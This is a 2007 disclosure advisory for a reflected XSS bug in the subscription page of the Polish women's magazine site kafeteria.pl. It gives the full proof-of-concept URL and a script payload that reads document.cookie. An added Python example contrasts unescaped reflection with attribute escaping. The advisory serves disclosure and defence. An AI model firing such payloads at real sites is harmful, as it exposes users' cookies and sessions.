kaneda@bohater.net
+
Subject:
XSS bug for www.kafeteria.pl
+
Version:
2007.04.09
+
Discovered by:
Kanedaaa: http://kaneda.bohater.net
+
kafeteria.pl Description:
Magazine for women (part of the o2.pl portal).
+
Description:
XSS in:
http://kafeteria.pl/prenumerata.php?email_sub=%22%3E%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E
Sent data:
"><script>alert(document.cookie);</script>
It's nothing special, since the site has no authentication of any kind.
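How the reflection works and how it is fixed, as an added example that is not part of the original advisory: a constructed stand-in for the subscription form echoes email_sub into an input's value attribute, shown beside an attribute-escaped version; the template, function names and the "script tag present" check are assumptions, not kafeteria.pl's code.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Constructed stand-in for the subscription form: the submitted address is
# echoed back into the input's value attribute (the reflection point).
TEMPLATE = '<form action="prenumerata.php"><input name="email_sub" value="{value}"></form>'

# URL from the advisory; the server URL-decodes the query before reflecting it.
ADVISORY_URL = ("http://kafeteria.pl/prenumerata.php?email_sub="
                "%22%3E%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E")


def email_sub_from_url(url: str) -> str:
    """Extract and URL-decode the email_sub parameter as the server would see it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("email_sub", [""])[0]


def render_vulnerable(email_sub: str) -> str:
    """Reflects the parameter verbatim: a '"' in the input closes the attribute."""
    return TEMPLATE.format(value=email_sub)


def render_fixed(email_sub: str) -> str:
    """HTML-escapes with quote=True, so '"' becomes &quot; and '<' becomes &lt;."""
    return TEMPLATE.format(value=html.escape(email_sub, quote=True))


def contains_script_tag(page: str) -> bool:
    """Crude check: does a live <script> element appear in the rendered markup?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    payload = email_sub_from_url(ADVISORY_URL)
    print("decoded parameter:", payload)
    print("vulnerable:", render_vulnerable(payload))  # script tag reaches the browser
    print("fixed:     ", render_fixed(payload))       # stays inside the attribute
```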
Timeline:
2007.04.09 bug discovered
2007.04.09 bug reported by mail via http://kontakt.o2.pl/index.php?help_o2=0&dzial=form&mode=form&cate_id=63
Original Advisory:
http://kaneda.bohater.net/security/20070409-xss-kafeteria.pl.php
Check my other bugs in the security section.